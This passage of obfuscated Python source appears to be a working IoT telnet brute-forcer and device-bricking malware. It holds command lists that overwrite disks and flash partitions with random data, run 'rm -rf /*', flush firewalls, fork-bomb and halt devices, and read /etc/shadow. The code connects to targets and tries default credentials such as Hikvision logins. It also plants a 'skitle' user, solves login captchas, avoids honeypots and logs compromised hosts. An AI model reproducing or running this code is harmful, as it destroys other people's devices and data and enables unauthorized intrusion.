DROP' , '%WAIT% ' , 'd(){ d|d & };d 2>/dev/null' , '[#$>] ' , 'sysctl -w net.ipv4.tcp_timestamps=0;sysctl -w kernel.threads-max=1' , '%WAIT% ' , 'halt -n -f' , '[#$>] ' , 'reboot' , '[#$>] ' , 'd(){ d|d & };d' , '%TERM%' , ] , [ "linux" , ".*" , '(Linux\s\S+\s\d\.\d|hAjUCNM1)' , 'su root' , '[#$>] ' , 'uptime' , '' , 'cat /etc/motd' , '' , 'fdisk -l' , '' , 'df' , '' , 'dd if=/dev/urandom of=/dev/sda &' , '' , 'dd if=/dev/urandom of=/dev/sda1 &' , '' , 'dd if=/dev/urandom of=/dev/sda2 &' , '' , 'dd if=/dev/urandom of=/dev/sda3 &' , '' , 'dd if=/dev/urandom of=/dev/sda4 &' , '' , 'dd if=/dev/urandom of=/dev/sdb &' , '' , 'dd if=/dev/urandom of=/dev/mtd0 &' , '' , 'dd if=/dev/urandom of=/dev/mtd1 &' , '' , 'dd if=/dev/urandom of=/dev/mtd2 &' , '' , 'dd if=/dev/urandom of=/dev/mtd3 &' , '' , 'dd if=/dev/urandom of=/dev/mtdblock0 &' , '' , 'dd if=/dev/urandom of=/dev/mtdblock1 &' , '' , 'dd if=/dev/urandom of=/dev/mtdblock2 &' , '' , 'dd if=/dev/urandom of=/dev/mtdblock3 &' , '' , 'dd if=/dev/urandom of=/dev/mtdblock4 &' , '' , 'dd if=/dev/urandom of=/dev/mtdblock5 &' , '' , 'dd if=/dev/urandom of=/dev/mtdblock6 &' , '' , 'dd if=/dev/urandom of=/dev/mtdblock7 &' , '[#$>] ' , 'dd if=/dev/urandom of=/dev/hda1 &' , '' , 'dd if=/dev/urandom of=/dev/hdb1 &' , '' , 'dd if=/dev/urandom of=/dev/root &' , '' , 'dd if=/dev/urandom of=/dev/ram0 &' , '' , 'dd if=/dev/urandom of=/dev/mmcblk0 &' , '' , 'dd if=/dev/urandom of=/dev/mmcblk0p1 &' , '' , 'cat /dev/urandom >/dev/sda &' , '' , 'cat /dev/urandom >/dev/sda1 &' , '' , 'cat /dev/urandom >/dev/sda2 &' , '' , 'cat /dev/urandom >/dev/sda3 &' , '' , 'cat /dev/urandom >/dev/sda4 &' , '' , 'cat /dev/urandom >/dev/sdb &' , '' , 'cat /dev/urandom >/dev/mtd0 &' , '' , 'cat /dev/urandom >/dev/mtd1 &' , '' , 'cat /dev/urandom >/dev/mtd2 &' , '' , 'cat /dev/urandom >/dev/mtd3 &' , '[#$>] ' , 'cat /dev/urandom >/dev/mtdblock0 &' , '' , 'cat /dev/urandom >/dev/mtdblock1 &' , '' , 'cat /dev/urandom >/dev/mtdblock2 &' , '' , 'cat /dev/urandom >/dev/mtdblock3 &' , '' , 'cat /dev/urandom >/dev/mtdblock4 &' , '' , 'cat /dev/urandom >/dev/mtdblock5 &' , '' , 'cat /dev/urandom >/dev/mtdblock6 &' , '' , 'cat /dev/urandom >/dev/mtdblock7 &' , '' , 'cat /dev/urandom >/dev/hda1 &' , '' , 'cat /dev/urandom >/dev/hdb1 &' , '' , 'cat /dev/urandom >/dev/root &' , '' , 'cat /dev/urandom >/dev/ram0 &' , '' , 'cat /dev/urandom >/dev/mmcblk0 &' , '' , 'cat /dev/urandom >/dev/mmcblk0p1 &' , '' , 'route del default;iproute del default;rm -rf /* 2>/dev/null &' , '' , 'iptables -F;iptables -t nat -F;iptables -A OUTPUT -j DROP' , '%WAIT% ' , 'd(){ d|d & };d 2>/dev/null' , '[#$>] ' , 'sysctl -w net.ipv4.tcp_timestamps=0;sysctl -w kernel.threads-max=1' , '%WAIT% ' , 'halt -n -f' , '[#$>] ' , 'reboot' , '[#$>] ' , 'd(){ d|d & };d' , '%TERM%' , ] , [ "telnet" , ".*" , ".*" , "cat /etc/shadow" , '[#$>] ' , ] , ] if 71 - 71: Ii % Ii11i1iIi if 57 - 57: Oo0Oo + oOoO0Ooo - IIiIii1iI - Oo0 - Ii11i1iIi * Ii if 39 - 39: IIiII . oOoO0Ooo / OOOoOooO - Ii11i1iIi O0O = "SPLTX" if 100 - 100: Ii if 72 - 72: IIiIIiIii1I if 79 - 79: OOOoOooO / Oo0 % oOOo0000o * i1 - o0ooO i1IIII11I = [ ] IiIi = { } o0oO0o = { } O0Oo = { } O0OO0oOoO0O00 = { } iiI1iIi1Ii1Iii = { } ooOo0 = { } iIiO00000o = { } Oo000o = { } o0O00ooo00OOo = { } IIi1ii1iI11I1 = { } OoOoO0o000 = { } oooo00O = { } if 95 - 95: Oo0 . OOOoOooO - i1IIi1i1iiI . o0oooooO if 11 - 11: I11I1Ii * Oo0 / IIiIii1iI - IIiIIiIii1I . IIiII ooooo0OOo0o = [ ] IIIi1iI1111Ii = { } OOOOoO00oOoO = { } O0o = { } I1IiIii1I1 = { } i11i1iIIii = { } i1O00o0O = { } iIi1ii1I = { } O0o0iI = { } if 92 - 92: OOooOO0 / o0ooO - O0oo - i1IIi1i1iiI - o0ooO if 53 - 53: oOOoO00oo0 % oOoO0Ooo % i1IIi1i1iiI % Oo0Oo def I1ii11 ( parsematrix , maxx , maxy ) : if 11 - 11: oOoO0Ooo . o0oooooO / Ii - OOOoOooO if 17 - 17: OOooOO0 - IIiII . i1IIi1i1iiI . IIiIIiIii1I * i1IIi1i1iiI % Ii for iIIiIIi11i in range ( maxy ) : for OO00 in range ( maxx ) : if not OO00 in parsematrix [ iIIiIIi11i ] : parsematrix [ iIIiIIi11i ] [ OO00 ] = ' ' if 48 - 48: Ii . i1IIi1i1iiI * IIiII * i1 - O0oo + o0oooooO if 85 - 85: Ii11i1iIi / IIiII * o0oooooO if 95 - 95: oOOo0000o % I11I1Ii i1I1I1i1i1i = [ ] for iIIiIIi11i in range ( maxy ) : O00o0000 = 0 OoOo0Oo000o = 0 O0Oi11IiIi1i = 0 for OO00 in range ( maxx ) : if parsematrix [ iIIiIIi11i ] [ OO00 ] != ' ' and parsematrix [ iIIiIIi11i ] [ OO00 ] != '\t' : if OO00 == 0 : O00o0000 = 1 if OO00 == maxx - 1 : OoOo0Oo000o = 1 if OO00 == int ( ( maxx - 1 ) / 2 ) : O0Oi11IiIi1i = 1 if OO00 == int ( ( maxx - 1 ) / 2 ) + 1 : O0Oi11IiIi1i = 1 i1iiI1 = "" if O00o0000 : i1iiI1 += 'L' if OoOo0Oo000o : i1iiI1 += 'R' if O0Oi11IiIi1i : i1iiI1 += 'M' i1I1I1i1i1i . append ( i1iiI1 ) if 55 - 55: OOOoOooO if i1I1I1i1i1i [ 0 ] == 'LRM' and i1I1I1i1i1i [ maxy - 1 ] == 'LRM' and i1I1I1i1i1i [ 1 ] == 'LR' and i1I1I1i1i1i [ maxy - 2 ] == 'LR' and i1I1I1i1i1i [ int ( ( maxy - 1 ) / 2 ) ] == 'LR' and i1I1I1i1i1i [ int ( ( maxy - 1 ) / 2 ) + 1 ] == 'LR' : return "0" if i1I1I1i1i1i [ 0 ] == 'M' and i1I1I1i1i1i [ maxy - 1 ] == 'LRM' and i1I1I1i1i1i [ 1 ] == 'M' and i1I1I1i1i1i [ maxy - 2 ] == 'M' : return "1" if i1I1I1i1i1i [ 0 ] == 'LRM' and i1I1I1i1i1i [ maxy - 1 ] == 'LRM' and i1I1I1i1i1i [ 1 ] == 'R' and i1I1I1i1i1i [ maxy - 2 ] == 'L' : return "2" if i1I1I1i1i1i [ 0 ] == 'LRM' and i1I1I1i1i1i [ maxy - 1 ] == 'LRM' and i1I1I1i1i1i [ 1 ] == 'R' and i1I1I1i1i1i [ maxy - 2 ] == 'R' : return "3" if i1I1I1i1i1i [ 0 ] == 'LR' and i1I1I1i1i1i [ maxy - 1 ] == 'R' and i1I1I1i1i1i [ 1 ] == 'LR' and i1I1I1i1i1i [ maxy - 2 ] == 'R' : return "4" if i1I1I1i1i1i [ 0 ] == 'LRM' and i1I1I1i1i1i [ maxy - 1 ] == 'LRM' and i1I1I1i1i1i [ 1 ] == 'L' and i1I1I1i1i1i [ maxy - 2 ] == 'R' : return "5" if i1I1I1i1i1i [ 0 ] == 'LRM' and i1I1I1i1i1i [ maxy - 1 ] == 'LRM' and i1I1I1i1i1i [ 1 ] == 'L' and i1I1I1i1i1i [ maxy - 2 ] == 'LR' : return "6" if i1I1I1i1i1i [ 0 ] == 'LRM' and i1I1I1i1i1i [ maxy - 1 ] == 'R' and i1I1I1i1i1i [ 1 ] == 'R' and i1I1I1i1i1i [ maxy - 2 ] == 'R' : return "7" if i1I1I1i1i1i [ 0 ] == 'LRM' and i1I1I1i1i1i [ maxy - 1 ] == 'LRM' and i1I1I1i1i1i [ 1 ] == 'LR' and i1I1I1i1i1i [ maxy - 2 ] == 'LR' and ( i1I1I1i1i1i [ int ( ( maxy - 1 ) / 2 ) ] == 'LRM' or i1I1I1i1i1i [ int ( ( maxy - 1 ) / 2 ) + 1 ] == 'LRM' ) : return "8" if i1I1I1i1i1i [ 0 ] == 'LRM' and i1I1I1i1i1i [ maxy - 1 ] == 'LRM' and i1I1I1i1i1i [ 1 ] == 'LR' and i1I1I1i1i1i [ maxy - 2 ] == 'R' : return "9" return "-" ; if 57 - 57: OOooOO0 - i1IIi1i1iiI % Oooo if 57 - 57: OOOoOooO if 18 - 18: I11I1Ii + oOoO0Ooo . O0oo - IIiIii1iI / o0ooO + OOOoOooO time . sleep ( 3 ) if 70 - 70: IIiIii1iI % IIiIIiIii1I / Oooo def i1o0o0O00O ( captcha ) : ooOO00oOo = "" II11oOoOOOOOO = [ ] for III1I in captcha . split ( '\n' ) : III1I = III1I . split ( '\r' ) [ 0 ] if '===========' in III1I : continue if re . search ( '[A-Za-z]' , III1I ) : continue if not re . search ( '\s.*\s.*\s.*\s.*\s.*\s.*\s.*\s.*\s.*\s' , III1I ) : continue II11oOoOOOOOO . append ( III1I ) if 35 - 35: oOOoO00oo0 + Oo0 / O0oo0OOOOO00 if 18 - 18: IIiIIiIii1I + IIiII / oOOoO00oo0 ii1i11iIii1I1i = len ( II11oOoOOOOOO ) if ii1i11iIii1I1i < 5 : return - 1 OoOO00 = 0 i1I1Ii = { } iIIiIIi11i = 0 if 98 - 98: i1 / oOOo0000o . oOoO0Ooo for III1I in II11oOoOOOOOO : i1I1Ii [ iIIiIIi11i ] = { } OO00 = 0 for OOO0OOOoo in III1I : i1I1Ii [ iIIiIIi11i ] [ OO00 ] = OOO0OOOoo OO00 += 1 if OO00 > OoOO00 : OoOO00 = OO00 if 23 - 23: O0oo % Oooo + o0oooooO / O0oo0OOOOO00 iIIiIIi11i += 1 if 64 - 64: IIiIIiIii1I if 47 - 47: IIiIii1iI + O0oo0OOOOO00 for iIIiIIi11i in range ( ii1i11iIii1I1i ) : for OO00 in range ( OoOO00 ) : if not OO00 in i1I1Ii [ iIIiIIi11i ] : i1I1Ii [ iIIiIIi11i ] [ OO00 ] = ' ' if 22 - 22: OOOoOooO . Oo0Oo if 69 - 69: oOOo0000o * i1IIi1i1iiI + i1IIi1i1iiI * OOOoOooO + Oo0Oo if 2 - 2: IIiIIiIii1I . Oo0 % OOOoOooO * O0oo0OOOOO00 % o0ooO - IIiIIiIii1I ii1II = { } for OO00 in range ( OoOO00 ) : oO0OOoo0 = 1 for iIIiIIi11i in range ( ii1i11iIii1I1i ) : if 2 - 2: OOooOO0 * o0oooooO + IIiII * o0ooO / Ii11i1iIi if 28 - 28: Ii11i1iIi . o0ooO - O0oo0OOOOO00 if i1I1Ii [ iIIiIIi11i ] [ OO00 ] != ' ' and i1I1Ii [ iIIiIIi11i ] [ OO00 ] != '\t' : oO0OOoo0 = 0 break elif i1I1Ii [ iIIiIIi11i ] [ OO00 ] == ' ' or i1I1Ii [ iIIiIIi11i ] [ OO00 ] == '\t' : pass if 45 - 45: oOoO0Ooo + Oo0 . oOOoO00oo0 - i1IIi1i1iiI if 2 - 2: Ii . Oo0 + IIiIii1iI + i1IIi1i1iiI + IIiIIiIii1I + IIiIIiIii1I ii1II [ OO00 ] = oO0OOoo0 if 83 - 83: IIiII % IIiIIiIii1I % Ii11i1iIi * oOOo0000o if 54 - 54: I11I1Ii % I11I1Ii + oOOo0000o . IIiIii1iI + o0oooooO - IIiII if 73 - 73: oOOoO00oo0 / O0oo0OOOOO00 ooOOOOOOO0o00 = - 1 OoIi = - 1 OO00 = 0 while ( OO00 < OoOO00 ) : if ii1II [ OO00 ] == 0 : ooOOOOOOO0o00 = OO00 OO00 += 1 while OO00 < OoOO00 - 1 : if ii1II [ OO00 ] == 1 and ii1II [ OO00 + 1 ] == 1 : if 21 - 21: O0oo0OOOOO00 - o0oooooO . Ii . O0oo0OOOOO00 OoIi = OO00 Iii111iI111I11 = { } OoOoo0OooO0o = 0 for iii1i1I111i111 in range ( ii1i11iIii1I1i ) : Iii111iI111I11 [ iii1i1I111i111 ] = { } oOoOO = 0 for ooOO0000O in range ( OoIi - ooOOOOOOO0o00 ) : if ii1II [ ooOO0000O + ooOOOOOOO0o00 ] == 1 : continue Iii111iI111I11 [ iii1i1I111i111 ] [ oOoOO ] = i1I1Ii [ iii1i1I111i111 ] [ ooOO0000O + ooOOOOOOO0o00 ] oOoOO += 1 if oOoOO > OoOoo0OooO0o : OoOoo0OooO0o = oOoOO if 83 - 83: oOOoO00oo0 ooOO00oOo += I1ii11 ( Iii111iI111I11 , OoOoo0OooO0o , ii1i11iIii1I1i ) ooOOOOOOO0o00 = - 1 OoIi = - 1 break OO00 += 1 OO00 += 1 return ooOO00oOo if 52 - 52: i1IIi1i1iiI . oOoO0Ooo - IIiIii1iI def OoO00Ooo0OoOo0O0Oo ( targetip , targetport , bannerhint ) : global i1I1 global OoO0 global ooo0o00O00 global i1I1iIIi1 if not OOoOo00oO0 : return O0000oO0O = ( targetip , int ( targetport ) ) o00O0OoOoo = hash ( O0000oO0O ) if o00O0OoOoo in ooooo0OOo0o : if 83 - 83: Ii / Oo0Oo * IIiII % Oo0Oo return if 18 - 18: OOOoOooO - Oooo + o0oooooO + O0oo - OOooOO0 i11i1iIIii [ o00O0OoOoo ] = 0 i1O00o0O [ o00O0OoOoo ] = [ ] if 69 - 69: OOooOO0 * O0oo if 99 - 99: I11I1Ii - oOOoO00oo0 . IIiIii1iI - oOOoO00oo0 / o0oooooO . IIiII if 20 - 20: Ii11i1iIi - oOOoO00oo0 for I1I1iIIi11I in i1I1iIIi1 : if 14 - 14: oOoO0Ooo - i1 if re . search ( I1I1iIIi11I [ 0 ] , bannerhint ) : if 59 - 59: Ii11i1iIi i1O00o0O [ o00O0OoOoo ] += I1I1iIIi11I [ 1 : ] if targetport != 4719 : i1O00o0O [ o00O0OoOoo ] . append ( OoO0 ) for I1I1iIIi11I in ooo0o00O00 : if 14 - 14: oOOo0000o - Oo0 if re . search ( I1I1iIIi11I [ 0 ] , bannerhint ) : if 47 - 47: IIiII / o0oooooO - i1 i1O00o0O [ o00O0OoOoo ] += I1I1iIIi11I [ 1 : ] if 11 - 11: oOOoO00oo0 - IIiIIiIii1I . i1IIi1i1iiI if len ( i1O00o0O [ o00O0OoOoo ] ) > 7 : while ( len ( i1O00o0O [ o00O0OoOoo ] ) < i1I1 ) : i1O00o0O [ o00O0OoOoo ] . append ( random . choice ( iiIO0OOoo ) ) else : if 12 - 12: i1IIi1i1iiI . oOOoO00oo0 % IIiIIiIii1I + I11I1Ii + IIiIIiIii1I / i1 i1O00o0O [ o00O0OoOoo ] += I1IIiI1i if 37 - 37: i1 % oOOo0000o while ( len ( i1O00o0O [ o00O0OoOoo ] ) < i1I1 ) : i1O00o0O [ o00O0OoOoo ] . append ( random . choice ( iiIO0OOoo ) ) if 71 - 71: oOOoO00oo0 % O0oo if 21 - 21: O0oo0OOOOO00 + Ii + Oo0 . Ii IIIi1iI1111Ii [ o00O0OoOoo ] = ( targetip , int ( targetport ) , bannerhint ) OOOOoO00oOoO [ o00O0OoOoo ] = 0 O0o [ o00O0OoOoo ] = None I1IiIii1I1 [ o00O0OoOoo ] = "" iIi1ii1I [ o00O0OoOoo ] = 0 O0o0iI [ o00O0OoOoo ] = "" ooooo0OOo0o . append ( o00O0OoOoo ) if 39 - 39: Oo0 % i1 def IIOooO0oo00oo ( targetip , targetport , bannerhint , masterhash ) : O0000oO0O = ( targetip , int ( targetport ) ) if 21 - 21: O0oo O0OOo00o00o = socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) O0OOo00o00o . setblocking ( 0 ) if 90 - 90: Ii11i1iIi - o0ooO - IIiII . O0oo - I11I1Ii % I11I1Ii try : O0OOo00o00o . connect ( O0000oO0O ) except : pass if 100 - 100: IIiIii1iI - IIiIIiIii1I * Oooo - oOOo0000o * I11I1Ii o00O0OoOoo = hash ( O0OOo00o00o ) i1IIII11I . append ( O0OOo00o00o ) IiIi [ o00O0OoOoo ] = ( targetip , int ( targetport ) , bannerhint ) iiI1iIi1Ii1Iii [ o00O0OoOoo ] = 0 if 29 - 29: o0oooooO * i1 / IIiII / oOOoO00oo0 if targetport == 9527 : iiI1iIi1Ii1Iii [ o00O0OoOoo ] = - 1 ooOo0 [ o00O0OoOoo ] = [ ] iIiO00000o [ o00O0OoOoo ] = 0 O0Oo [ o00O0OoOoo ] = '' O0OO0oOoO0O00 [ o00O0OoOoo ] = '' Oo000o [ o00O0OoOoo ] = time . time ( ) o0O00ooo00OOo [ o00O0OoOoo ] = '' IIi1ii1iI11I1 [ o00O0OoOoo ] = '' OoOoO0o000 [ o00O0OoOoo ] = 0 oooo00O [ o00O0OoOoo ] = '' o0oO0o [ o00O0OoOoo ] = masterhash O0o [ masterhash ] = O0OOo00o00o return O0OOo00o00o if 93 - 93: o0ooO * Oo0 . Ii11i1iIi * o0ooO % o0oooooO def Oo0oooOo00 ( brutehash ) : i11i1iIIii [ brutehash ] = None i1O00o0O [ brutehash ] = None IIIi1iI1111Ii [ brutehash ] = None OOOOoO00oOoO [ brutehash ] = None O0o [ brutehash ] = None I1IiIii1I1 [ brutehash ] = None iIi1ii1I [ brutehash ] = None O0o0iI [ brutehash ] = None ooooo0OOo0o . remove ( brutehash ) if 1 - 1: OOooOO0 def ooOO ( sock ) : global i1I1 global OoO00 global iiIII11I1i1Ii global I1i if 62 - 62: IIiII % oOoO0Ooo * OOOoOooO - Ii o00O0OoOoo = hash ( sock ) try : sock . close ( ) except : pass if 86 - 86: IIiII + IIiIIiIii1I . o0oooooO . OOOoOooO IIiIIiIiIi = o0oO0o [ o00O0OoOoo ] if 38 - 38: I11I1Ii - OOooOO0 if 34 - 34: OOOoOooO / IIiIIiIii1I % i1IIi1i1iiI % OOOoOooO if 23 - 23: oOOo0000o . oOOo0000o / oOOoO00oo0 + Oooo - I11I1Ii * Ii if 49 - 49: i1IIi1i1iiI * O0oo % I11I1Ii - IIiIIiIii1I . O0oo if 43 - 43: i1 . Oooo % oOOo0000o % Oo0Oo + Ii11i1iIi . Ii if 37 - 37: oOOo0000o * O0oo if iiI1iIi1Ii1Iii [ o00O0OoOoo ] >= 5 and ( iiIII11I1i1Ii or I1i ) : if 84 - 84: Oo0 * o0ooO . o0ooO % O0oo / i1 iii = I1IiIii1I1 [ IIiIIiIiIi ] if iii == 'honeypot' or iii == 'mtguest' : iIi1ii1I [ IIiIIiIiIi ] = 9999 if iii == '' : iii = 'unknown' Ooo0 = '' if o0O00ooo00OOo [ o00O0OoOoo ] : Ooo0 = o0O00ooo00OOo [ o00O0OoOoo ] + '/' elif IIi1ii1iI11I1 [ o00O0OoOoo ] : Ooo0 = O0o0iI [ IIiIIiIiIi ] . split ( '/' ) [ 0 ] + '/' if IIi1ii1iI11I1 [ o00O0OoOoo ] : Ooo0 += IIi1ii1iI11I1 [ o00O0OoOoo ] oOo00o00O = re . sub ( '\r?\n' , ';' , O0Oo [ o00O0OoOoo ] ) oOo00o00O = re . sub ( '[^A-Za-z0-9 \.,:;<>\(\)\[\]\-+%!@/#$=]' , '' , oOo00o00O ) if not I1i or iii == 'unknown' or iii == 'telnet' : Ii111i11iIi ( "%s:%d BR:%s:%s:%s:%s" % ( IIIi1iI1111Ii [ IIiIIiIiIi ] [ 0 ] , IIIi1iI1111Ii [ IIiIIiIiIi ] [ 1 ] , iii , O0o0iI [ IIiIIiIiIi ] , Ooo0 , oOo00o00O [ : 8192 ] ) ) ; else : Ii111i11iIi ( "%s:%d BR:%s:%s:%s:%s" % ( IIIi1iI1111Ii [ IIiIIiIiIi ] [ 0 ] , IIIi1iI1111Ii [ IIiIIiIiIi ] [ 1 ] , iii , O0o0iI [ IIiIIiIiIi ] , Ooo0 , oOo00o00O [ : 32 ] ) ) ; if 89 - 89: IIiII - IIiIii1iI + Ii * IIiIii1iI * IIiII if 16 - 16: o0ooO / o0oooooO - i1IIi1i1iiI if 62 - 62: Oooo Iioo0OooOoO = time . time ( ) if OOOOoO00oOoO [ IIiIIiIiIi ] <= Iioo0OooOoO : OOOOoO00oOoO [ IIiIIiIiIi ] = time . time ( ) + OoO00 O0o [ IIiIIiIiIi ] = None iIi1ii1I [ IIiIIiIiIi ] += 1 if 35 - 35: I11I1Ii if iIi1ii1I [ IIiIIiIiIi ] >= i1I1 : if 49 - 49: IIiIIiIii1I + oOOo0000o % Ii11i1iIi if 38 - 38: IIiIii1iI + o0ooO * i1IIi1i1iiI Oo0oooOo00 ( IIiIIiIiIi ) if 27 - 27: O0oo0OOOOO00 + Oo0 - o0ooO + oOOo0000o if 92 - 92: IIiIii1iI % IIiII if 81 - 81: oOOoO00oo0 - Ii11i1iIi * o0oooooO / oOOoO00oo0 % o0ooO if 96 - 96: Ii11i1iIi + o0oooooO . Ii11i1iIi - OOooOO0 + OOooOO0 if 8 - 8: o0oooooO + oOoO0Ooo % OOooOO0 if 5 - 5: Ii11i1iIi * O0oo0OOOOO00 * IIiII * o0ooO if 8 - 8: Oooo * IIiIii1iI . Ii . IIiII . O0oo0OOOOO00 if 95 - 95: I11I1Ii - i1 . Oo0 . o0ooO - o0ooO / o0ooO i1IIII11I . remove ( sock ) IiIi [ o00O0OoOoo ] = None iiI1iIi1Ii1Iii [ o00O0OoOoo ] = None ooOo0 [ o00O0OoOoo ] = None iIiO00000o [ o00O0OoOoo ] = None O0Oo [ o00O0OoOoo ] = None O0OO0oOoO0O00 [ o00O0OoOoo ] = None Oo000o [ o00O0OoOoo ] = None o0O00ooo00OOo [ o00O0OoOoo ] = None IIi1ii1iI11I1 [ o00O0OoOoo ] = None OoOoO0o000 [ o00O0OoOoo ] = None o0oO0o [ o00O0OoOoo ] = None oooo00O [ o00O0OoOoo ] = None if 24 - 24: o0oooooO def OoOO0Oo ( ) : Iioo0OooOoO = time . time ( ) for IIIiiiI in ooooo0OOo0o : IIiIIiIiIi = hash ( IIIiiiI ) if O0o [ IIiIIiIiIi ] == None : if 60 - 60: I11I1Ii if Iioo0OooOoO >= OOOOoO00oOoO [ IIiIIiIiIi ] : if 53 - 53: Ii11i1iIi % Oo0Oo O0OOo00o00o = IIOooO0oo00oo ( IIIi1iI1111Ii [ IIiIIiIiIi ] [ 0 ] , IIIi1iI1111Ii [ IIiIIiIiIi ] [ 1 ] , IIIi1iI1111Ii [ IIiIIiIiIi ] [ 2 ] , IIiIIiIiIi ) O0o [ IIiIIiIiIi ] = O0OOo00o00o OOOOoO00oOoO [ IIiIIiIiIi ] = 0 if 2 - 2: Ii11i1iIi . O0oo0OOOOO00 % IIiIIiIii1I def ii1iI1I11 ( sock , brutehash , masterhash ) : global oOooOooO0ooO if 45 - 45: o0oooooO + I11I1Ii / IIiIIiIii1I - IIiIIiIii1I - Oooo if 57 - 57: o0oooooO % O0oo if 'cabhCdpServerRouter: 127.0.0.1' in O0Oo [ brutehash ] and len ( ooOo0 [ brutehash ] ) > 2 : ooOo0 [ brutehash ] = ooOo0 [ brutehash ] [ 2 : ] O0Oo [ brutehash ] = re . sub ( "cabhCdpServerRouter: 127.0.0.1" , '(already set)' , O0Oo [ brutehash ] ) if 21 - 21: I11I1Ii . Oooo / i1IIi1i1iiI if 7 - 7: oOOoO00oo0 * i1IIi1i1iiI - o0oooooO - Oooo * i1IIi1i1iiI if len ( ooOo0 [ brutehash ] ) <= 1 : if 91 - 91: O0oo0OOOOO00 iIiO00000o [ brutehash ] = time . time ( ) + 10 iiI1iIi1Ii1Iii [ brutehash ] = 9 try : sock . shutdown ( ) except : pass ooOo0 [ brutehash ] = '' return 0 if 43 - 43: Ii - Oooo oOo0 = True while ooOo0 [ brutehash ] [ 1 ] == '' or oOo0 : if 97 - 97: oOOo0000o * O0oo % OOooOO0 % o0ooO * o0ooO if '%' in ooOo0 [ brutehash ] [ 0 ] : if '%OLDUSER%' in ooOo0 [ brutehash ] [ 0 ] : ooOo0 [ brutehash ] [ 0 ] = re . sub ( '%OLDUSER%' , O0o0iI [ masterhash ] . split ( '/' ) [ 0 ] , ooOo0 [ brutehash ] [ 0 ] ) if '%OLDPASS%' in ooOo0 [ brutehash ] [ 0 ] : ooOo0 [ brutehash ] [ 0 ] = re . sub ( '%OLDPASS%' , O0o0iI [ masterhash ] . split ( '/' ) [ 1 ] , ooOo0 [ brutehash ] [ 0 ] ) if '%NEWUSER%' in ooOo0 [ brutehash ] [ 0 ] : o0O00ooo00OOo [ brutehash ] = 'skitle' ooOo0 [ brutehash ] [ 0 ] = re . sub ( '%NEWUSER%' , 'skitle' , ooOo0 [ brutehash ] [ 0 ] ) if '%NEWPASS%' in ooOo0 [ brutehash ] [ 0 ] : if IIi1ii1iI11I1 [ brutehash ] == '' : IIi1ii1iI11I1 [ brutehash ] = '' . join ( random . choice ( 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz012345678901234567890123456789' ) for i in range ( 8 ) ) ooOo0 [ brutehash ] [ 0 ] = re . sub ( '%NEWPASS%' , IIi1ii1iI11I1 [ brutehash ] , ooOo0 [ brutehash ] [ 0 ] ) if '%TARGETIP%' in ooOo0 [ brutehash ] [ 0 ] : ooOo0 [ brutehash ] [ 0 ] = re . sub ( '%TARGETIP%' , IIIi1iI1111Ii [ masterhash ] [ 0 ] , ooOo0 [ brutehash ] [ 0 ] ) if '%TARGETPORT%' in ooOo0 [ brutehash ] [ 0 ] : ooOo0 [ brutehash ] [ 0 ] = re . sub ( '%TARGETPORT%' , '%d' % ( IIIi1iI1111Ii [ masterhash ] [ 1 ] ) , ooOo0 [ brutehash ] [ 0 ] ) if '%RELAUNCH%' in ooOo0 [ brutehash ] [ 0 ] : if 15 - 15: i1 * i1 i1O00o0O [ masterhash ] = [ 'root/20080826' , 'root/20080826' , 'root/20080826' ] i11i1iIIii [ masterhash ] = 0 ooOO ( sock ) return 0 if 65 - 65: i1IIi1i1iiI if 57 - 57: o0oooooO / I11I1Ii * IIiIii1iI * Ii11i1iIi % Oooo if '%RELAUNCH2%' in ooOo0 [ brutehash ] [ 0 ] : if 81 - 81: Ii11i1iIi * Ii11i1iIi / Ii * IIiII if 1 - 1: i1IIi1i1iiI . i1IIi1i1iiI - oOoO0Ooo i1O00o0O [ masterhash ] = [ 'root/hikvision' , 'root/hikvision' , O0o0iI [ masterhash ] , O0o0iI [ masterhash ] ] i11i1iIIii [ masterhash ] = 0 ooOO ( sock ) return 0 if 100 - 100: Ii11i1iIi / oOOo0000o . o0ooO OooOO0OO = '\n' if oooo00O [ brutehash ] == 'R' : OooOO0OO = '\r\n' try : if 10 - 10: oOOo0000o . O0oo0OOOOO00 sock . send ( ooOo0 [ brutehash ] [ 0 ] + OooOO0OO ) except : pass if ooOo0 [ brutehash ] [ 1 ] == '' : if len ( ooOo0 [ brutehash ] ) <= 2 : if 93 - 93: O0oo0OOOOO00 iIiO00000o [ brutehash ] = time . time ( ) + 10 iiI1iIi1Ii1Iii [ brutehash ] = 9 try : sock . shutdown ( ) except : pass ooOo0 [ brutehash ] = '' return 0 else : ooOo0 [ brutehash ] = ooOo0 [ brutehash ] [ 2 : ] else : oOo0 = False if 94 - 94: oOOoO00oo0 . Ii11i1iIi / o0ooO * OOOoOooO . i1IIi1i1iiI / oOOo0000o if len ( ooOo0 [ brutehash ] ) <= 0 : return 0 if 95 - 95: oOoO0Ooo . I11I1Ii % oOOoO00oo0 iIiO00000o [ brutehash ] = time . time ( ) + oOooOooO0ooO O0OO0oOoO0O00 [ brutehash ] = '' return 1 if 45 - 45: OOOoOooO i11IiiI1 = { } if 26 - 26: I11I1Ii / Ii11i1iIi - Oooo def OOO0000OO0oO0 ( ) : global ooiI1 global O0oOOoO global oOoOOoooo0 global oOooOooO0ooO global i11IiiI1 if 35 - 35: OOOoOooO - IIiIIiIii1I % Ii / o0ooO + IIiII Iioo0OooOoO = time . time ( ) if 52 - 52: oOOo0000o + o0ooO % Oooo - i1IIi1i1iiI - IIiIii1iI if 19 - 19: IIiII % Ii11i1iIi O00Oo = 0.01 IIiI1i , O0o0 , IiIIiI11I = select . select ( i1IIII11I , i1IIII11I , [ ] , O00Oo ) for O0O0 in i1IIII11I : o00O0OoOoo = hash ( O0O0 ) try : o0oo0OOOo = O0O0 . getsockopt ( socket . SOL_SOCKET , socket . SO_ERROR ) except : o0oo0OOOo = - 1 if o0oo0OOOo != 0 : if 81 - 81: O0oo0OOOOO00 - Ii % OOooOO0 - Ii11i1iIi + Oo0Oo ooOO ( O0O0 ) continue if O0O0 in IIiI1i : O0 = '' try : O0 = O0O0 . recv ( 2048 ) except : pass if 44 - 44: I11I1Ii . O0oo * Ii - i1IIi1i1iiI - o0ooO * IIiII try : for ii1iI1ii in re . findall ( '\xff\xfd.' , O0 ) : O0O0 . send ( '\xff\xfc' + ii1iI1ii [ 2 ] ) for oo0OOO0OOoOO in re . findall ( '\xff\xfb.' , O0 ) : O0O0 . send ( '\xff\xfe' + oo0OOO0OOoOO [ 2 ] ) except : pass if O0 : O0Oo [ o00O0OoOoo ] += O0 O0OO0oOoO0O00 [ 